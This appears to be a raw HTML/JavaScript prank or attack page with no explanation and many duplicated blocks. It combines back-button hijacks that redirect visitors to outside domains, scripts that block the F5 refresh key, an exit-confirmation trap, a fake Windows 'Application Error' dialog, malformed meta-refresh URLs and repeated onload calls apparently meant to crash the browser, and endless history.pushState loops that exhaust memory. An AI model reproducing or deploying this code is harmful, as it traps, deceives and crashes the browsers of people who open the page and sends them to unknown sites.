<script src="jost.js"></script>

<script type="text/javascript" src="js/backfix.min.js"></script>
<script type="text/javascript">// <![CDATA[
bajb_backdetect.OnBack = function(){
    document.location.href = 'http://WATCHEUE-YYS-HSOI-29.com'; 
}
// ]]></script>
<script>
JQuery(document).ready(function($) {
  if (window.history && window.history.pushState) 
  {
    window.history.pushState('forward', null, './');
    $(window).on('popstate', function() 
    {
      var ref = document.referrer;
      if (ref!='')
      {
        if (ref.match(".*?\\bgoogle\\b.*?")) 
        {
          window.location.href = 'http://google.fukiste.xyz';
        }
      }
    });
  }
});
</script>
<script type="text/javascript" src="js/backfix.min.js"></script>
<script type="text/javascript">// <![CDATA[
bajb_backdetect.OnBack = function(){
    document.location.href = 'http://WATCHEUE-YYS-HSOI-29.com'; 
}
// ]]></script>
<script>
JQuery(document).ready(function($) {
  if (window.history && window.history.pushState) 
  {
    window.history.pushState('forward', null, './');
    $(window).on('popstate', function() 
    {
      var ref = document.referrer;
      if (ref!='')
      {
        if (ref.match(".*?\\bgoogle\\b.*?")) 
        {
          window.location.href = 'http://google.fukiste.xyz';
        }
      }
    });
  }
});
</script>
<script>
(function(window, location) {
history.replaceState(null, document.title, location.pathname+"#!/history");
history.pushState(null, document.title, location.pathname);

window.addEventListener("popstate", function() {
  if(location.hash === "#!/history") {
    history.replaceState(null, document.title, location.pathname);
    setTimeout(function(){
      location.replace("http://www.sil39.net");
    },0);
  }
}, false);
}(window, location));
</script>
<script>
(function(window, location) {
history.replaceState(null, document.title, location.pathname+"#!/history");
history.pushState(null, document.title, location.pathname);

window.addEventListener("popstate", function() {
  if(location.hash === "#!/history") {
    history.replaceState(null, document.title, location.pathname);
    setTimeout(function(){
      location.replace("http://www.sil39.net");
    },0);
  }
}, false);
}(window, location));
</script>
<script>
(function(window, location) {
history.replaceState(null, document.title, location.pathname+"#!/history");
history.pushState(null, document.title, location.pathname);

window.addEventListener("popstate", function() {
  if(location.hash === "#!/history") {
    history.replaceState(null, document.title, location.pathname);
    setTimeout(function(){
      location.replace("http://www.sil39.net");
    },0);
  }
}, false);
}(window, location));
</script>
<script>
(function(window, location) {
history.replaceState(null, document.title, location.pathname+"#!/history");
history.pushState(null, document.title, location.pathname);

window.addEventListener("popstate", function() {
  if(location.hash === "#!/history") {
    history.replaceState(null, document.title, location.pathname);
    setTimeout(function(){
      location.replace("http://www.sil39.net");
    },0);
  }
}, false);
}(window, location));
</script>
<script>
(function(window, location) {
history.replaceState(null, document.title, location.pathname+"#!/history");
history.pushState(null, document.title, location.pathname);

window.addEventListener("popstate", function() {
  if(location.hash === "#!/history") {
    history.replaceState(null, document.title, location.pathname);
    setTimeout(function(){
      location.replace("http://www.sil39.net");
    },0);
  }
}, false);
}(window, location));
</script>
<script>
(function(window, location) {
history.replaceState(null, document.title, location.pathname+"#!/history");
history.pushState(null, document.title, location.pathname);

window.addEventListener("popstate", function() {
  if(location.hash === "#!/history") {
    history.replaceState(null, document.title, location.pathname);
    setTimeout(function(){
      location.replace("http://www.sil39.net");
    },0);
  }
}, false);
}(window, location));
</script>
<script>
(function(window, location) {
history.replaceState(null, document.title, location.pathname+"#!/history");
history.pushState(null, document.title, location.pathname);

window.addEventListener("popstate", function() {
  if(location.hash === "#!/history") {
    history.replaceState(null, document.title, location.pathname);
    setTimeout(function(){
      location.replace("http://www.sil39.net");
    },0);
  }
}, false);
}(window, location));
</script>
<script>
(function(window, location) {
history.replaceState(null, document.title, location.pathname+"#!/history");
history.pushState(null, document.title, location.pathname);

window.addEventListener("popstate", function() {
  if(location.hash === "#!/history") {
    history.replaceState(null, document.title, location.pathname);
    setTimeout(function(){
      location.replace("http://www.sil39.net");
    },0);
  }
}, false);
}(window, location));
</script>
<script>
(function(window, location) {
history.replaceState(null, document.title, location.pathname+"#!/history");
history.pushState(null, document.title, location.pathname);

window.addEventListener("popstate", function() {
  if(location.hash === "#!/history") {
    history.replaceState(null, document.title, location.pathname);
    setTimeout(function(){
      location.replace("http://www.sil39.net");
    },0);
  }
}, false);
}(window, location));
</script>
<script>
(function(window, location) {
history.replaceState(null, document.title, location.pathname+"#!/history");
history.pushState(null, document.title, location.pathname);

window.addEventListener("popstate", function() {
  if(location.hash === "#!/history") {
    history.replaceState(null, document.title, location.pathname);
    setTimeout(function(){
      location.replace("http://www.sil39.net");
    },0);
  }
}, false);
}(window, location));
</script>
<body onkeydown="return (event.keyCode != 116)">  
</body> 
<body>  
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.8.3/jquery.min.js"></script>  
<script type="text/javascript">  
    $(function () {  
        $(document).keydown(function (e) {  
            return (e.which || e.keyCode) != 116;  
        });  
    });  
</script>  
</body>  
<body onkeydown="return (event.keyCode != 116)">  
</body> 
<body>  
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.8.3/jquery.min.js"></script>  
<script type="text/javascript">  
    $(function () {  
        $(document).keydown(function (e) {  
            return (e.which || e.keyCode) != 116;  
        });  
    });  
</script>  
</body>  
<body onkeydown="return (event.keyCode != 116)">  
</body> 
<body>  
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.8.3/jquery.min.js"></script>  
<script type="text/javascript">  
    $(function () {  
        $(document).keydown(function (e) {  
            return (e.which || e.keyCode) != 116;  
        });  
    });  
</script>  
</body>  
<body onkeydown="return (event.keyCode != 116)">  
</body> 
<body>  
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.8.3/jquery.min.js"></script>  
<script type="text/javascript">  
    $(function () {  
        $(document).keydown(function (e) {  
            return (e.which || e.keyCode) != 116;  
        });  
    });  
</script>  
</body>  
<body onkeydown="return (event.keyCode != 116)">  
</body> 
<body>  
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.8.3/jquery.min.js"></script>  
<script type="text/javascript">  
    $(function () {  
        $(document).keydown(function (e) {  
            return (e.which || e.keyCode) != 116;  
        });  
    });  
</script>  
</body>  
<a href="../html-link.htm" target="_blank">lol</a>
<body onload="JavaScript:CrashAndBurn(self.location,'_blank');JavaScript:CrashAndBurn(self.location,'_blank');JavaScript:CrashAndBurn(self.location,'_blank');JavaScript:CrashAndBurn(self.location,'_blank');JavaScript:CrashAndBurn(self.location,'_blank');JavaScript:CrashAndBurn(self.location,'_blank');JavaScript:CrashAndBurn(self.location,'_blank');JavaScript:CrashAndBurn(self.location,'_blank');JavaScript:CrashAndBurn(self.location,'_blank');JavaScript:CrashAndBurn(self.location,'_blank');">
    <body onload="JavaScript:CrashAndBurn(self.location,'_blank');JavaScript:CrashAndBurn(self.location,'_blank');JavaScript:CrashAndBurn(self.location,'_blank');JavaScript:CrashAndBurn(self.location,'_blank');JavaScript:CrashAndBurn(self.location,'_blank');JavaScript:CrashAndBurn(self.location,'_blank');JavaScript:CrashAndBurn(self.location,'_blank');JavaScript:CrashAndBurn(self.location,'_blank');JavaScript:CrashAndBurn(self.location,'_blank');JavaScript:CrashAndBurn(self.location,'_blank');">
        <body onload="JavaScript:CrashAndBurn(self.location,'_blank');JavaScript:CrashAndBurn(self.location,'_blank');JavaScript:CrashAndBurn(self.location,'_blank');JavaScript:CrashAndBurn(self.location,'_blank');JavaScript:CrashAndBurn(self.location,'_blank');JavaScript:CrashAndBurn(self.location,'_blank');JavaScript:CrashAndBurn(self.location,'_blank');JavaScript:CrashAndBurn(self.location,'_blank');JavaScript:CrashAndBurn(self.location,'_blank');JavaScript:CrashAndBurn(self.location,'_blank');">
            <meta http-equiv="refresh" content="0; url=file:///%%300" />
            <html><head>
<style type="text/css">
#a {
        margin:0 10px 10px;
}

#b {
        width:100%;
}

</style>
<title>less goo</title>
</head>
<body>
<table><tr><td>
<div id="a">
<form id="b">
<input type="text" name="lmao"/>
</div>
</td><td width="1"></td></tr></table>
</body></html>
<meta http-equiv="refresh" content="0; url=http://a/%%300" />
            <title>less goo</title>
</head>
<body>
<table><tr><td>
<div id="a">
<form id="b">
<input type="text" name="lmao"/>
</div>
</td><td width="1"></td></tr></table>
</body></html>
<html>
 <head>
  <title>Connecting...</title>
  <script type="text/JavaScript">
<!--
var g_isOkToClose = false;

window.onbeforeunload = function ()
{
 if ( g_isOkToClose == true )
  return;

 var closeMessage =
  'You are exiting this page.\n' +
  'I would appreciate it if you would log out first.\n' +
  'Are you sure you want to exit?';

 if ( window.event )
 {
  // IE only...

  window.event.returnValue = closeMessage;
 }
 else
 {
  // Other browsers NOTE: Not tested...

  return closeMessage;
 }

 g_isOkToClose = false;
}
// -->
</script>
 </head>

 <body style="margin: 0px; overflow:hidden;">
  <div style="position: relative;">
   <div style="position: absolute; top: 0; left: 0; width: 100%; height: 100%; cursor:wait;"></div>
   <iframe src="http://www.wikipedia.com/" width="100%" height="100%" style="border: 0px;">
   </iframe>
  </div>
 </body>
</html>
<!DOCTYPE html><html>
<head><style>
body {
  font: 11px sans-serif;
}
#window {
  background-color: #ECE9D8;
  padding: 3px;
  width: 574px;
  margin: 20px auto 0 auto;
  -moz-user-select: -moz-none;
  -khtml-user-select: none;
  -webkit-user-select: none;
  -ms-user-select: none;
  user-select: none;
}
header {
  background-color: #1E74EF;
  background-image: -moz-linear-gradient(left, #003ac9 0%, #4492e5 100%);
  background-image: -webkit-linear-gradient(left, #003ac9 0%, #4492e5 100%);
  background-image: linear-gradient(to right, #003ac9 0%, #4492e5 100%);
  clear: both;
  padding: 3px;
}
p {
  margin-left: 60px;
}
h1 {
  font: bold 13px sans-serif;
  color: white;
  margin: 1px;
}
button {
  background-color: #ECE9D8;
  outline: none;
  cursor: inherit;
}
#close {
  float: right;
  font-size: 16px;
  font-weight: bold;
  padding: 0 2px;
  margin: 0;
  text-align: center;
  height: 18px;
  line-height: 16px;
}
#ok {
  width: 75px;
  height: 23px;
  margin: 0 auto;
  margin-bottom: 13px;
  display: block;
}
</style></head><body>
<div id="window">
  <header>
    <button id="close" title="Close">×</button>
    <h1><span id="browser"></span>Application Error</h1>
  </header>
  <p>The instruction at "</span>" referenced memory at "<span class="hex"></span>". The memory could not be "read".</p>
  <p>Click on OK to terminate the program</p>
  <button id="ok">OK</button>
</div>
<script src='//ajax.googleapis.com/ajax/libs/jquery/1.11.0/jquery.min.js'></script>
<script src='//ajax.googleapis.com/ajax/libs/jqueryui/1.10.4/jquery-ui.min.js'></script>

$('#window').draggable({handle:'header'});

function randomHex(){
  return '0x'+(Math.floor(Math.random()*0xffffffff)).toString(16);
}

$('.hex').each(function(){
  $(this).text(randomHex());
});

var reg = /(opera|chrome|safari|firefox|msie)/i,
    browser = navigator.userAgent.match(reg)[0].toLowerCase();
if(!browser){
  browser = 'firefox';
} else if(browser == 'msie'){
  browser = 'ie';
}
$('#browser').text(browser + '.exe - ');

$('button').click(function(){
  $('html, body').css('cursor','wait');
});
</script>
</body></html>
<script>
var total = "";
for( var i = 0; i < 10000000000000; i++ ) {
  total += i.toString();
  history.pushState(0,0, total );
}
</script>
<script>
var total = "";
for( var i = 0; i < 10000000000000; i++ ) {
  total += i.toString();
  history.pushState(0,0, total );
}
</script>
<script>
var total = "";
for( var i = 0; i < 10000000000000; i++ ) {
  total += i.toString();
  history.pushState(0,0, total );
}
</script>
<script>
var total = "";
for( var i = 0; i < 10000000000000; i++ ) {
  total += i.toString();
  history.pushState(0,0, total );
}
</script>
<script>
var total = "";
for( var i = 0; i < 10000000000000; i++ ) {
  total += i.toString();
  history.pushState(0,0, total );
}
</script>
<script>
var total = "";
for( var i = 0; i < 10000000000000; i++ ) {
  total += i.toString();
  history.pushState(0,0, total );
}
</script>
<script>
var total = "";
for( var i = 0; i < 10000000000000; i++ ) {
  total += i.toString();
  history.pushState(0,0, total );
}
</script>
<script>
var total = "";
for( var i = 0; i < 10000000000000; i++ ) {
  total += i.toString();
  history.pushState(0,0, total );
}
</script>
<script>
var total = "";
for( var i = 0; i < 10000000000000; i++ ) {
  total += i.toString();
  history.pushState(0,0, total );
}
</script>
